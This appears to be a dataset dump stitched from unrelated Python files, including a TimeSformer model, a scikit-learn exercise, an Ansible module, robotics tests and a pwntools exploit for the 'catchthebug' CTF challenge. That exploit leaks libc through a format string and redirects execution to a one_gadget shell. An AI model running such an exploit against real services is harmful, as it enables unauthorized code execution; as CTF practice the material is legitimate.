x = x + self.pos_embed
x = self.pos_drop(x)
if self.attention_type != 'space_only':
cls_tokens = x[:B, 0, :].unsqueeze(1)
x = x[:, 1:]
x = rearrange(x, '(b t) n m -> (b n) t m', b=B, t=T)
if T != self.time_embed.size(1):
time_embed = self.time_embed.transpose(1, 2)
new_time_embed = F.interpolate(time_embed, size=T, mode='nearest')
new_time_embed = new_time_embed.transpose(1, 2)
x = x + new_time_embed
else:
x = x + self.time_embed
x = self.time_drop(x)
x = rearrange(x, '(b n) t m -> b (n t) m', b=B, t=T)
x = torch.cat((cls_tokens, x), dim=1)
for blk in self.blocks:
x = blk(x, B, T, W)
if self.attention_type == 'space_only':
x = rearrange(x, '(b t) n m -> b t n m', b=B, t=T)
x = torch.mean(x, 1)
x = self.norm(x)
return x[:, 0]
def forward(self, x):
x = self.forward_features(x)
x = self.head(x)
return x
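# --- Illustrative usage (addition, not part of the original file) -----------
# End-to-end forward pass through a deliberately small VisionTransformer
# (random weights, no checkpoint needed); the hyper-parameters below are
# chosen only to keep the demo light.
def _demo_vision_transformer():
    model = VisionTransformer(img_size=224, patch_size=16, num_classes=10,
                              embed_dim=192, depth=2, num_heads=3,
                              num_frames=8, attention_type='divided_space_time')
    clip = torch.rand(2, 3, 8, 224, 224)        # (B, C, T, H, W)
    logits = model(clip)
    assert logits.shape == (2, 10)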
def _conv_filter(state_dict, patch_size=16):
""" convert patch embedding weight from manual patchify + linear proj to conv"""
out_dict = {}
for k, v in state_dict.items():
if 'patch_embed.proj.weight' in k:
if v.shape[-1] != patch_size:
patch_size = v.shape[-1]
v = v.reshape((v.shape[0], 3, patch_size, patch_size))
out_dict[k] = v
return out_dict
IMAGENET_DEFAULT_MEAN = (0.485, 0.456, 0.406)
IMAGENET_DEFAULT_STD = (0.229, 0.224, 0.225)
def _cfg(url='', **kwargs):
return {'url': url, 'num_classes': 1000, 'input_size': (3, 224, 224), 'pool_size': None, 'crop_pct': 0.9, 'interpolation': 'bicubic', 'mean': IMAGENET_DEFAULT_MEAN, 'std': IMAGENET_DEFAULT_STD, 'first_conv': 'patch_embed.proj', 'classifier': 'head', **kwargs}
default_cfgs = {'vit_base_patch16_224': _cfg(url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-vitjx/jx_vit_base_p16_224-80ecf9dd.pth', mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))}
_logger = logging.getLogger(__name__)
def load_state_dict(checkpoint_path, use_ema=False):
if checkpoint_path and os.path.isfile(checkpoint_path):
checkpoint = torch.load(checkpoint_path, map_location='cpu')
state_dict_key = 'state_dict'
if isinstance(checkpoint, dict):
if use_ema and 'state_dict_ema' in checkpoint:
state_dict_key = 'state_dict_ema'
if state_dict_key and state_dict_key in checkpoint:
new_state_dict = OrderedDict()
for k, v in checkpoint[state_dict_key].items():
name = k[7:] if k.startswith('module') else k
new_state_dict[name] = v
state_dict = new_state_dict
elif 'model_state' in checkpoint:
state_dict_key = 'model_state'
new_state_dict = OrderedDict()
for k, v in checkpoint[state_dict_key].items():
name = k[6:] if k.startswith('model') else k
new_state_dict[name] = v
state_dict = new_state_dict
else:
state_dict = checkpoint
_logger.info("Loaded {} from checkpoint '{}'".format(state_dict_key, checkpoint_path))
return state_dict
else:
_logger.error("No checkpoint found at '{}'".format(checkpoint_path))
raise FileNotFoundError()
def load_pretrained(model, cfg=None, num_classes=1000, in_chans=3, filter_fn=None, img_size=224, num_frames=8, num_patches=196, attention_type='divided_space_time', pretrained_model='', strict=True):
if cfg is None:
cfg = getattr(model, 'default_cfg')
if cfg is None or 'url' not in cfg or not cfg['url']:
_logger.warning('Pretrained model URL is invalid, using random initialization.')
return
if len(pretrained_model) == 0:
state_dict = model_zoo.load_url(cfg['url'], progress=False, map_location='cpu')
else:
try:
state_dict = load_state_dict(pretrained_model)['model']
        except KeyError:  # no 'model' sub-dict: the checkpoint stores weights at the top level
state_dict = load_state_dict(pretrained_model)
if filter_fn is not None:
state_dict = filter_fn(state_dict)
if in_chans == 1:
conv1_name = cfg['first_conv']
_logger.info('Converting first conv (%s) pretrained weights from 3 to 1 channel' % conv1_name)
conv1_weight = state_dict[conv1_name + '.weight']
conv1_type = conv1_weight.dtype
conv1_weight = conv1_weight.float()
O, I, J, K = conv1_weight.shape
if I > 3:
assert conv1_weight.shape[1] % 3 == 0
conv1_weight = conv1_weight.reshape(O, I // 3, 3, J, K)
conv1_weight = conv1_weight.sum(dim=2, keepdim=False)
else:
conv1_weight = conv1_weight.sum(dim=1, keepdim=True)
        conv1_weight = conv1_weight.to(conv1_type)  # restore the dtype captured above
state_dict[conv1_name + '.weight'] = conv1_weight
elif in_chans != 3:
conv1_name = cfg['first_conv']
conv1_weight = state_dict[conv1_name + '.weight']
conv1_type = conv1_weight.dtype
conv1_weight = conv1_weight.float()
O, I, J, K = conv1_weight.shape
if I != 3:
_logger.warning('Deleting first conv (%s) from pretrained weights.' % conv1_name)
del state_dict[conv1_name + '.weight']
strict = False
else:
_logger.info('Repeating first conv (%s) weights in channel dim.' % conv1_name)
repeat = int(math.ceil(in_chans / 3))
conv1_weight = conv1_weight.repeat(1, repeat, 1, 1)[:, :in_chans, :, :]
conv1_weight *= 3 / float(in_chans)
            conv1_weight = conv1_weight.to(conv1_type)  # restore the dtype captured above
state_dict[conv1_name + '.weight'] = conv1_weight
classifier_name = cfg['classifier']
if num_classes == 1000 and cfg['num_classes'] == 1001:
classifier_weight = state_dict[classifier_name + '.weight']
state_dict[classifier_name + '.weight'] = classifier_weight[1:]
classifier_bias = state_dict[classifier_name + '.bias']
state_dict[classifier_name + '.bias'] = classifier_bias[1:]
elif num_classes != state_dict[classifier_name + '.weight'].size(0):
del state_dict[classifier_name + '.weight']
del state_dict[classifier_name + '.bias']
strict = False
if num_patches + 1 != state_dict['pos_embed'].size(1):
pos_embed = state_dict['pos_embed']
cls_pos_embed = pos_embed[0, 0, :].unsqueeze(0).unsqueeze(1)
other_pos_embed = pos_embed[0, 1:, :].unsqueeze(0).transpose(1, 2)
new_pos_embed = F.interpolate(other_pos_embed, size=num_patches, mode='nearest')
new_pos_embed = new_pos_embed.transpose(1, 2)
new_pos_embed = torch.cat((cls_pos_embed, new_pos_embed), 1)
state_dict['pos_embed'] = new_pos_embed
if 'time_embed' in state_dict and num_frames != state_dict['time_embed'].size(1):
time_embed = state_dict['time_embed'].transpose(1, 2)
new_time_embed = F.interpolate(time_embed, size=num_frames, mode='nearest')
state_dict['time_embed'] = new_time_embed.transpose(1, 2)
if attention_type == 'divided_space_time':
new_state_dict = state_dict.copy()
for key in state_dict:
if 'blocks' in key and 'attn' in key:
new_key = key.replace('attn', 'temporal_attn')
            if new_key not in state_dict:
new_state_dict[new_key] = state_dict[key]
else:
new_state_dict[new_key] = state_dict[new_key]
if 'blocks' in key and 'norm1' in key:
new_key = key.replace('norm1', 'temporal_norm1')
            if new_key not in state_dict:
new_state_dict[new_key] = state_dict[key]
else:
new_state_dict[new_key] = state_dict[new_key]
state_dict = new_state_dict
model.load_state_dict(state_dict, strict=False)
class vit_base_patch16_224(nn.Module):
def __init__(self, cfg, **kwargs):
super(vit_base_patch16_224, self).__init__()
self.pretrained = True
patch_size = 16
self.model = VisionTransformer(img_size=cfg.DATA.TRAIN_CROP_SIZE, num_classes=cfg.MODEL.NUM_CLASSES, patch_size=patch_size, embed_dim=768, depth=12, num_heads=12, mlp_ratio=4, qkv_bias=True, norm_layer=partial(nn.LayerNorm, eps=1e-06), drop_rate=0.0, attn_drop_rate=0.0, drop_path_rate=0.1, num_frames=cfg.DATA.NUM_FRAMES, attention_type=cfg.TIMESFORMER.ATTENTION_TYPE, **kwargs)
self.attention_type = cfg.TIMESFORMER.ATTENTION_TYPE
self.model.default_cfg = default_cfgs['vit_base_patch16_224']
self.num_patches = cfg.DATA.TRAIN_CROP_SIZE // patch_size * (cfg.DATA.TRAIN_CROP_SIZE // patch_size)
pretrained_model = cfg.TIMESFORMER.PRETRAINED_MODEL
if self.pretrained:
load_pretrained(self.model, num_classes=self.model.num_classes, in_chans=kwargs.get('in_chans', 3), filter_fn=_conv_filter, img_size=cfg.DATA.TRAIN_CROP_SIZE, num_patches=self.num_patches, attention_type=self.attention_type, pretrained_model=pretrained_model)
def forward(self, x):
x = self.model(x)
return x
class TimeSformer(nn.Module):
def __init__(self, img_size=224, patch_size=16, num_classes=400, num_frames=8, attention_type='divided_space_time', pretrained_model='', **kwargs):
super(TimeSformer, self).__init__()
self.pretrained = True
self.model = VisionTransformer(img_size=img_size, num_classes=num_classes, patch_size=patch_size, embed_dim=768, depth=12, num_heads=12, mlp_ratio=4, qkv_bias=True, norm_layer=partial(nn.LayerNorm, eps=1e-06), drop_rate=0.0, attn_drop_rate=0.0, drop_path_rate=0.1, num_frames=num_frames, attention_type=attention_type, **kwargs)
self.attention_type = attention_type
self.model.default_cfg = default_cfgs['vit_base_patch' + str(patch_size) + '_224']
self.num_patches = img_size // patch_size * (img_size // patch_size)
if self.pretrained:
load_pretrained(self.model, num_classes=self.model.num_classes, in_chans=kwargs.get('in_chans', 3), filter_fn=_conv_filter, img_size=img_size, num_frames=num_frames, num_patches=self.num_patches, attention_type=self.attention_type, pretrained_model=pretrained_model)
def forward(self, x):
x = self.model(x)
return x
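# --- Illustrative usage (addition, not part of the original file) -----------
# Building the full video model. Note that self.pretrained is hard-coded to
# True above, so constructing TimeSformer fetches the ImageNet ViT weights
# from the URL in default_cfgs -- this sketch therefore assumes network
# access (or a local checkpoint passed via pretrained_model).
def _demo_timesformer():
    model = TimeSformer(img_size=224, patch_size=16, num_classes=400,
                        num_frames=8, attention_type='divided_space_time')
    clip = torch.rand(1, 3, 8, 224, 224)        # (B, C, T, H, W)
    logits = model(clip)
    assert logits.shape == (1, 400)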
import torch
from torch.nn import MSELoss, ReLU
from _paritybench_helpers import _mock_config, _mock_layer, _paritybench_base, _fails_compile
TESTCASES = [
# (nn.Module, init_args, forward_args, jit_compiles)
(BasicTransform,
lambda: ([], {'dim_in': 4, 'dim_out': 4, 'temp_kernel_size': 4, 'stride': 1}),
lambda: ([torch.rand([4, 4, 4, 4, 4])], {}),
True),
(BottleneckTransform,
lambda: ([], {'dim_in': 4, 'dim_out': 4, 'temp_kernel_size': 4, 'stride': 1, 'dim_inner': 4, 'num_groups': 1}),
lambda: ([torch.rand([4, 4, 4, 4, 4])], {}),
True),
(Conv2dSame,
lambda: ([], {'in_channels': 4, 'out_channels': 4, 'kernel_size': 4}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
False),
(DropPath,
lambda: ([], {}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
False),
(Linear,
lambda: ([], {'in_features': 4, 'out_features': 4}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
True),
(Mlp,
lambda: ([], {'in_features': 4}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
True),
(Nonlocal,
lambda: ([], {'dim': 4, 'dim_inner': 4}),
lambda: ([torch.rand([4, 4, 4, 4, 4])], {}),
False),
(ResNetBasicStem,
lambda: ([], {'dim_in': 4, 'dim_out': 4, 'kernel': 4, 'stride': 1, 'padding': 4}),
lambda: ([torch.rand([4, 4, 4, 4, 4])], {}),
True),
(SE,
lambda: ([], {'dim_in': 4, 'ratio': 4}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
True),
(Swish,
lambda: ([], {}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
False),
(X3DTransform,
lambda: ([], {'dim_in': 4, 'dim_out': 4, 'temp_kernel_size': 4, 'stride': 1, 'dim_inner': 4, 'num_groups': 1}),
lambda: ([torch.rand([4, 4, 4, 4, 4])], {}),
False),
]
class Test_facebookresearch_TimeSformer(_paritybench_base):
def test_000(self):
self._check(*TESTCASES[0])
def test_001(self):
self._check(*TESTCASES[1])
def test_002(self):
self._check(*TESTCASES[2])
def test_003(self):
self._check(*TESTCASES[3])
def test_004(self):
self._check(*TESTCASES[4])
def test_005(self):
self._check(*TESTCASES[5])
def test_006(self):
self._check(*TESTCASES[6])
def test_007(self):
self._check(*TESTCASES[7])
def test_008(self):
self._check(*TESTCASES[8])
def test_009(self):
self._check(*TESTCASES[9])
def test_010(self):
self._check(*TESTCASES[10])
| [
"[email protected]"
] | |
9fde6b1cc14c9a979633c4f2df97f24dca4d78bb | 84290c584128de3e872e66dc99b5b407a7a4612f | /Supervised Learning with scikit-learn/Preprocessing and pipelines/Centering and scaling.py | c21eb26fe58bf9a8d53c990a24d3b0ab871dee0b | [] | no_license | BautizarCodigo/DataAnalyticEssentials | 91eddc56dd1b457e9e3e1e3db5fbbb2a85d3b789 | 7f5f3d8936dd4945ee0fd854ef17f04a04eb7b57 | refs/heads/main | 2023-04-11T04:42:17.977491 | 2021-03-21T19:05:17 | 2021-03-21T19:05:17 | 349,784,608 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 504 | py | # Import scale
from sklearn.preprocessing import scale
# Scale the features: X_scaled
X_scaled = scale(X)
# Print the mean and standard deviation of the unscaled features
print("Mean of Unscaled Features: {}".format(np.mean(X)))
print("Standard Deviation of Unscaled Features: {}".format(np.std(X)))
# Print the mean and standard deviation of the scaled features
print("Mean of Scaled Features: {}".format(np.mean(X_scaled)))
print("Standard Deviation of Scaled Features: {}".format(np.std(X_scaled))) | [
"[email protected]"
] | |
a8ba14a006fb88ac5415201cfab9678983738d9d | b47f2e3f3298388b1bcab3213bef42682985135e | /experiments/fdtd-2d/tmp_files/2238.py | 6dfcdd1cd9629a3c959c2e3b61310de6617d05bf | [
"BSD-2-Clause"
] | permissive | LoopTilingBenchmark/benchmark | 29cc9f845d323431e3d40e878cbfc6d1aad1f260 | 52a3d2e70216552a498fd91de02a2fa9cb62122c | refs/heads/master | 2020-09-25T09:45:31.299046 | 2019-12-04T23:25:06 | 2019-12-04T23:25:06 | 225,975,074 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | from chill import *
source('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/polybench/polybench-code/stencils/fdtd-2d/kernel.c')
destination('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/experiments/fdtd-2d/tmp_files/2238.c')
procedure('kernel_fdtd_2d')
loop(0)
known(' nx > 1 ')
known(' ny > 1 ')
tile(1,2,20,2)
tile(1,4,16,4)
tile(2,2,20,2)
tile(2,4,16,4)
tile(3,2,20,2)
tile(3,4,16,4)
| [
"[email protected]"
] | |
bd6651931aed58d7bfd2c1949c7dea3b99edfd6c | b685036280331fa50fcd87f269521342ec1b437b | /src/data_mining_demo/py_shuJuWaJue_ruMen_yu_ShiJian/chapter3/demo2.py | 7e2ee679470b22f9af507b2f12f77a6431309659 | [] | no_license | chenqing666/myML_DM_Test | f875cb5b2a92e81bc3de2a0070c0185b7eacac89 | 5ac38f7872d94ca7cedd4f5057bb93732b5edbad | refs/heads/master | 2022-02-26T01:52:06.293025 | 2019-09-20T06:35:25 | 2019-09-20T06:35:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 175 | py | import pickle
import numpy as np
import pandas as pd
datafile = "./cleanedData.dai"
with open(datafile, 'rb') as file:
dataset = pickle.load(file)
print(dataset.head()) | [
"[email protected]"
] | |
71b2e819f9b87e7fec810e93dc2fb3d1006ac89d | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_combos.py | cac18802b80f0f4ecc83aabd2e7d23ba1ed8481a | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 231 | py |
from xai.brain.wordbase.nouns._combo import _COMBO
#calss header
class _COMBOS(_COMBO, ):
def __init__(self,):
_COMBO.__init__(self)
self.name = "COMBOS"
self.specie = 'nouns'
self.basic = "combo"
self.jsondata = {}
| [
"[email protected]"
] | |
82812f0cb1ad89fee4e2c4ad453429f5b4e8cc8f | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_118/619.py | 85060cf54efea0ef148ad0160403ca71cbb9b978 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 596 | py | # -*- coding: utf-8 -*-
import sys
def is_palindrome(num):
s1 = str(num)
s2 = s1[::-1]
return s1 == s2
fair_numbers = []
for i in range(pow(10, 7)+1):
if is_palindrome(i):
num = i*i
if is_palindrome(num):
fair_numbers.append(num)
N = int(sys.stdin.readline())
for T in range(1, N+1):
min_val, max_val = map(int, sys.stdin.readline().strip().split())
ans = 0
for num in fair_numbers:
if num < min_val:
continue
if num > max_val:
break
ans += 1
print 'Case #%(T)s: %(ans)s' % locals()
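# The linear scan above is fine because very few fair-and-square numbers exist
# below 10**14, but with many queries you could binary-search the (already
# sorted) precomputed list instead -- a sketch, not used by the solution:
import bisect

def count_fair(lo, hi):
    # fair_numbers is built in increasing order, so bisect applies directly
    return bisect.bisect_right(fair_numbers, hi) - bisect.bisect_left(fair_numbers, lo)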
| [
"[email protected]"
] | |
c0056aa85383d670add5f74e627672b310c662ce | a867b1c9da10a93136550c767c45e0d8c98f5675 | /G_LC_1055_ShortestWaytoFormString.py | 057fd0b488c0696e709603ccc3d5993c1b5d2c98 | [] | no_license | Omkar02/FAANG | f747aacc938bf747129b8ff35b6648fb265d95b6 | ee9b245aa83ea58aa67954ab96442561dbe68d06 | refs/heads/master | 2023-03-25T19:45:08.153403 | 2021-03-28T07:13:08 | 2021-03-28T07:13:08 | 280,783,785 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 835 | py | # import __main__ as main
# from Helper.TimerLogger import CodeTimeLogging
# fileName = main.__file__
# fileName = fileName.split('\\')[-1]
# CodeTimeLogging(Flag='F', filename=fileName, Tag='String', Difficult='Medium')
def shotestWaytoFormString(scr, target):
numMinString = 0
remaning = target
while len(remaning) != 0:
subsequence = ""
i = j = 0
while i < len(scr) and j < len(remaning):
if scr[i] == remaning[j]:
subsequence += remaning[j]
j += 1
i += 1
if len(subsequence) == 0:
return -1
numMinString += 1
remaning = remaning[len(subsequence):]
return numMinString
scr = "abc"
target = "abcbc"
scr = "abc"
target = "abcdbc"
a = [1, 2, 3, 4, 5]
print(shotestWaytoFormString(scr, target))
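# Worked check of the greedy scan above: for scr = "abc", target = "abcbc" the
# first sweep over scr matches the subsequence "abc" (leaving "bc") and the
# second sweep matches "bc", so 2 copies suffice; "abcdbc" contains 'd', which
# never appears in scr, so it is impossible (-1).
assert shotestWaytoFormString("abc", "abcbc") == 2
assert shotestWaytoFormString("abc", "abcdbc") == -1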
| [
"[email protected]"
] | |
3ef7e25a59a3ca2672554115318f33e31822fd25 | e5dc27e634aba70bcd1b3acea74fed84ddccf837 | /plugins/modules/template_project.py | 432a757ecb62ba97acf49d326d6c97cb68fe269b | [] | no_license | jejrichardson/dnacenter-ansible | 264d1b52227d4bf78ad175494763cff9e7881f34 | f10078ef8323bda4b542e71bcecf4f80a7fe0609 | refs/heads/master | 2023-01-28T09:54:57.449459 | 2020-12-09T23:15:49 | 2020-12-09T23:15:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,792 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2020, Rafael Campos <[email protected]>
# GNU General Public License v3.0+ (see LICENSE or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {
"metadata_version": "0.0.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = r"""
---
module: template_project
short_description: Manage TemplateProject objects of ConfigurationTemplates
description:
- Returns the projects in the system.
- Creates a new project.
- Updates an existing project.
- Deletes an existing Project.
version_added: '1.0'
author: Rafael Campos (@racampos)
options:
name:
description:
- Name of project to be searched.
- ProjectDTO's name.
type: str
createTime:
description:
- ProjectDTO's createTime.
type: int
description:
description:
- ProjectDTO's description.
type: str
id:
description:
- ProjectDTO's id.
type: str
lastUpdateTime:
description:
- ProjectDTO's lastUpdateTime.
type: int
tags:
description:
- ProjectDTO's tags (list of strings).
type: list
templates:
description:
- ProjectDTO's templates.
type: dict
project_id:
description:
- ProjectId path parameter.
- Required for state delete.
type: str
requirements:
- dnacentersdk
seealso:
# Reference by module name
- module: cisco.dnac.plugins.module_utils.definitions.template_project
# Reference by Internet resource
- name: TemplateProject reference
description: Complete reference of the TemplateProject object model.
link: https://developer.cisco.com/docs/dna-center/api/1-3-3-x
# Reference by Internet resource
- name: TemplateProject reference
description: SDK reference.
link: https://dnacentersdk.readthedocs.io/en/latest/api/api.html#v2-1-1-summary
"""
EXAMPLES = r"""
- name: get_projects
cisco.dnac.template_project:
state: query # required
name: SomeValue # string
register: query_result
- name: create_project
cisco.dnac.template_project:
state: create # required
createTime: 1 # integer
description: SomeValue # string
id: SomeValue # string
lastUpdateTime: 1 # integer
name: SomeValue # string
tags:
- SomeValue # string
templates: None
- name: update_project
cisco.dnac.template_project:
state: update # required
createTime: 1 # integer
description: SomeValue # string
id: SomeValue # string
lastUpdateTime: 1 # integer
name: SomeValue # string
tags:
- SomeValue # string
templates: None
- name: delete_project
cisco.dnac.template_project:
state: delete # required
project_id: SomeValue # string, required
"""
RETURN = """
get_projects:
description: Returns the projects in the system.
returned: always
type: dict
contains:
payload:
description: It is the template project's payload.
returned: always
type: list
contains:
name:
description: It is the template project's name.
returned: always
type: str
sample: '<name>'
id:
description: It is the template project's id.
returned: always
type: str
sample: '478012'
templates:
description: It is the template project's templates.
returned: always
type: list
contains:
name:
description: It is the template project's name.
returned: always
type: str
sample: '<name>'
composite:
description: It is the template project's composite.
returned: always
type: bool
sample: false
id:
description: It is the template project's id.
returned: always
type: str
sample: '478012'
create_project:
description: Creates a new project.
returned: success
type: dict
contains:
response:
description: ProjectDTO's response.
returned: success
type: dict
contains:
taskId:
description: It is the template project's taskId.
returned: success
type: dict
url:
description: It is the template project's url.
returned: success
type: str
sample: '<url>'
version:
description: ProjectDTO's version.
returned: success
type: str
sample: '1.0'
update_project:
description: Updates an existing project.
returned: changed
type: dict
contains:
response:
description: ProjectDTO's response.
returned: changed
type: dict
contains:
taskId:
description: It is the template project's taskId.
returned: changed
type: dict
url:
description: It is the template project's url.
returned: changed
type: str
sample: '<url>'
version:
description: ProjectDTO's version.
returned: changed
type: str
sample: '1.0'
delete_project:
description: Deletes an existing Project.
returned: success
type: dict
contains:
response:
description: Response, property of the response body.
returned: success
type: dict
contains:
taskId:
description: It is the template project's taskId.
returned: success
type: dict
url:
description: It is the template project's url.
returned: success
type: str
sample: '<url>'
version:
description: Version, property of the response body.
returned: success
type: str
sample: '1.0'
"""
| [
"[email protected]"
] | |
ce4cb92d76d50fbd63accaff41bd8af8bbd952e1 | 0f9b6a33a5e2ce627db75d1bcc34bc3f3674335b | /sctf/2018/catchthebug/exploit.py | 10ff19c7084f606481adcd2e34de7136bf30a20a | [] | no_license | hnoson/writeups | 359a33b03286bab19359ad9b089e6f3bfe4fb708 | 05550e3c462108f6c5ba0b69f65694e2eb1dc9b3 | refs/heads/master | 2021-10-07T18:21:26.041101 | 2021-10-03T10:22:31 | 2021-10-03T10:22:31 | 119,823,623 | 7 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,927 | py | #!/usr/bin/env python
from pwn import *
def catch(name):
while True:
s.sendlineafter('>> ', '1')
s.recvline()
if s.recvline(False) == 'There is no bug =(':
continue
s.sendafter('>> ', name)
break
def inspect(num):
s.sendlineafter('>> ', '2')
ret = []
for i in range(num):
s.recvuntil('==\n')
ret.append((s.recvline(False), len(s.recvuntil('=')) - 2))
return ret
def submit(title = 'A' * 0x40, subtitle = 'A' * 0x80, body = 'A' * 0x100, tag = 'A' * 8, password = 'A' * 8):
s.sendlineafter('>> ', '3')
s.sendafter('title\n', title)
s.sendafter('subtitle\n', subtitle)
if len(body) < 0x100:
body += '\n'
s.sendafter('body\n', body)
if len(tag) < 8:
tag += '\n'
s.sendafter('tag\n', tag)
s.sendafter('password\n', password)
if __name__ == '__main__':
# context.log_level = 'DEBUG'
if len(sys.argv) == 1:
s = process('./bug_3e99623da36874fd424a4e237866e301d292aa66')
# s = process('./bug_3e99623da36874fd424a4e237866e301d292aa66', env = {'LD_PRELOAD': './libc-2.26.so_cc8df6278e095fcc4ca8a98e1f1c69c04db30a4c'})
else:
s = remote('catchthebug.eatpwnnosleep.com', 55555)
libc = ELF('./libc-2.26.so_cc8df6278e095fcc4ca8a98e1f1c69c04db30a4c')
one_gadgets = [0x47c46, 0x47c9a, 0xfccde, 0xfdb8e]
catch('%p\n')
catch('AAAA')
catch('AAAA')
res = inspect(3)
libc_base = int(res[0][0], 16) - libc.symbols['_IO_2_1_stdout_'] - 131
log.info('libc base: %#x' % libc_base)
length = 8 * 3 + sum([l for _, l in res]) + 0x40 + 0x80
log.info('report length: %#x' % length)
if length < 0x618:
print 'try again'
exit(0)
body = 'A' * (0x708 - length)
body += p64(libc_base + 0x608040 + 3840 - len(body) - 0x9)
tag = p64(libc_base + one_gadgets[2])
submit(body = body, tag = tag)
s.interactive()
| [
"[email protected]"
] | |
85614f4b027e1a236f12c98d6e2f0dbb9b39b778 | 2425ad0e81a695eb126b31f2ccf82dfd478851c3 | /tests/test_ets.py | d8636cb441a212b3bfaa502b4e83c50a972f032f | [
"MIT"
] | permissive | jhavl/ropy | 62ab28297ae7e4ee6076009777d28aff98fdb2a2 | 38b12369530253a16c22ef1f5be0bcb75053ffd8 | refs/heads/master | 2021-01-07T20:39:00.899851 | 2020-11-29T10:35:24 | 2020-11-29T10:35:24 | 241,814,788 | 17 | 3 | MIT | 2020-04-29T05:36:43 | 2020-02-20T06:55:34 | Python | UTF-8 | Python | false | false | 22,573 | py | #!/usr/bin/env python3
"""
Created on Fri May 1 14:04:04 2020
@author: Jesse Haviland
"""
import numpy.testing as nt
import numpy as np
import ropy as rp
import unittest
import spatialmath as sm
class TestETS(unittest.TestCase):
def test_panda(self):
panda = rp.Panda()
qz = np.array([0, 0, 0, 0, 0, 0, 0])
qr = panda.qr
nt.assert_array_almost_equal(panda.qr, qr)
nt.assert_array_almost_equal(panda.qz, qz)
nt.assert_array_almost_equal(
panda.gravity, np.array([[0], [0], [9.81]]))
def test_q(self):
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
q2 = [1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9]
q3 = np.expand_dims(q1, 0)
panda.q = q1
nt.assert_array_almost_equal(panda.q, q1)
panda.q = q2
nt.assert_array_almost_equal(panda.q, q2)
panda.q = q3
nt.assert_array_almost_equal(np.expand_dims(panda.q, 0), q3)
def test_getters(self):
panda = rp.Panda()
panda.qdd = np.ones((7, 1))
panda.qd = np.ones((1, 7))
panda.qdd = panda.qd
panda.qd = panda.qdd
def test_control_type(self):
panda = rp.Panda()
panda.control_type = 'v'
self.assertEqual(panda.control_type, 'v')
def test_base(self):
panda = rp.Panda()
pose = sm.SE3()
panda.base = pose.A
nt.assert_array_almost_equal(np.eye(4), panda.base.A)
panda.base = pose
nt.assert_array_almost_equal(np.eye(4), panda.base.A)
# def test_str(self):
# panda = rp.Panda()
# ans = '\nPanda (Franka Emika): 7 axis, RzRzRzRzRzRzRz, ETS\n'\
# 'Elementary Transform Sequence:\n'\
# '[tz(0.333), Rz(q0), Rx(-90), Rz(q1), Rx(90), tz(0.316), '\
# 'Rz(q2), tx(0.0825), Rx(90), Rz(q3), tx(-0.0825), Rx(-90), '\
# 'tz(0.384), Rz(q4), Rx(90), Rz(q5), tx(0.088), Rx(90), '\
# 'tz(0.107), Rz(q6)]\n'\
# 'tool: t = (0, 0, 0.103), RPY/xyz = (0, 0, -45) deg'
# self.assertEqual(str(panda), ans)
# def test_str_ets(self):
# panda = rp.Panda()
# ans = '[tz(0.333), Rz(q0), Rx(-90), Rz(q1), Rx(90), tz(0.316), '\
# 'Rz(q2), tx(0.0825), Rx(90), Rz(q3), tx(-0.0825), Rx(-90), '\
# 'tz(0.384), Rz(q4), Rx(90), Rz(q5), tx(0.088), Rx(90), '\
# 'tz(0.107), Rz(q6)]'
# self.assertEqual(str(panda.ets), ans)
def test_fkine(self):
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
q2 = [1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9]
q3 = np.expand_dims(q1, 0)
ans = np.array([
[-0.50827907, -0.57904589, 0.63746234, 0.44682295],
[0.83014553, -0.52639462, 0.18375824, 0.16168396],
[0.22915229, 0.62258699, 0.74824773, 0.96798113],
[0., 0., 0., 1.]
])
panda.q = q1
nt.assert_array_almost_equal(panda.fkine().A, ans)
nt.assert_array_almost_equal(panda.fkine(q2).A, ans)
nt.assert_array_almost_equal(panda.fkine(q3).A, ans)
nt.assert_array_almost_equal(panda.fkine(q3).A, ans)
self.assertRaises(TypeError, panda.fkine, 'Wfgsrth')
def test_fkine_traj(self):
panda = rp.Panda()
q = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
qq = np.c_[q, q, q, q]
ans = np.array([
[-0.50827907, -0.57904589, 0.63746234, 0.44682295],
[0.83014553, -0.52639462, 0.18375824, 0.16168396],
[0.22915229, 0.62258699, 0.74824773, 0.96798113],
[0., 0., 0., 1.]
])
